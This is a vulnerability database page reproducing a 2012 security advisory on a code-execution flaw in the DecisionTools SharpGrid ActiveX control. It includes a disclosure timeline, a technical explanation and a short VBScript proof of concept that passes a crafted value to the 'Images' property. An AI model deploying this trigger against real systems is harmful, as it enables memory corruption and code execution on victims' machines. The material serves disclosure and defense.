Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

DecisionTools SharpGrid Active-X Code Execution

🗓️ 09 May 2012 00:00:00Reported by Francis ProvencherType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 52 Views

DecisionTools SharpGrid Active-X Code Execution Vulnerability. SharpGrid ActiveX control insecurely handles Images propert

Code
`#####################################################################################  
  
Application: DecisionTools SharpGrid ActiveX Control Code Execution Vulnerability  
Platforms: Windows  
Secunia: SA48571   
Date: 2012-05-09  
Author: Francis Provencher (Protek Research Lab's)  
Website: http://www.protekresearchlab.com/  
Twitter: @ProtekResearch  
  
#####################################################################################  
  
1) Introduction  
2) Report Timeline  
3) Technical details  
4) POC  
  
  
#####################################################################################  
  
===============  
1) Introduction  
===============  
The DecisionTools Suite is an integrated set of programs for risk analysis and decision making  
under uncertainty that runs in Microsoft Excel. The DecisionTools Suite includes @RISK for  
Monte Carlo simulation, PrecisionTree for decision trees, and TopRank for “what if” sensitivity analysis.  
In addition, the DecisionTools Suite comes with StatTools for statistical analysis and forecasting,  
NeuralTools for predictive neural networks, and Evolver and RISKOptimizer for optimization.  
All programs work together better than ever before, and all integrate completely with  
Microsoft Excel for ease of use and maximum flexibility.  
  
http://www.palisade.com/decisiontools_suite/  
#####################################################################################  
  
============================  
2) Report Timeline  
============================  
  
2012-03-26 Vulnerability reported to Secunia  
2012-05-09 Publication of this advisory  
  
  
#####################################################################################  
  
============================  
3) Technical details  
============================  
  
The vulnerability is caused due to the "Images" property in the SharpGrid ActiveX control  
insecurely using the assigned value as an image list pointer and can be exploited to call a  
virtual function within an arbitrary memory location.  
  
  
#####################################################################################  
  
===========  
4) POC  
===========  
  
<object classid='clsid:5BAADB36-D13B-4708-B8E6-7FACF1BF6783' id='target' />  
<script language='vbscript'>  
targetFile = "C:\Program Files\Common Files\Data Dynamics\Sharpgrid\sg20u.ocx"  
prototype = "Property Let Images As Long"  
memberName = "Images"  
progid = "DDSharpGrid2U.SGGrid"  
argCount = 1  
arg1=2147483647  
target.Images = arg1  
  
</script>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 May 2012 00:00Current
7.4High risk
Vulners AI Score7.4
decisiontools suitemicrosoft excelsecuniacode executionactivexvulnerabilityexploitationmemory location
52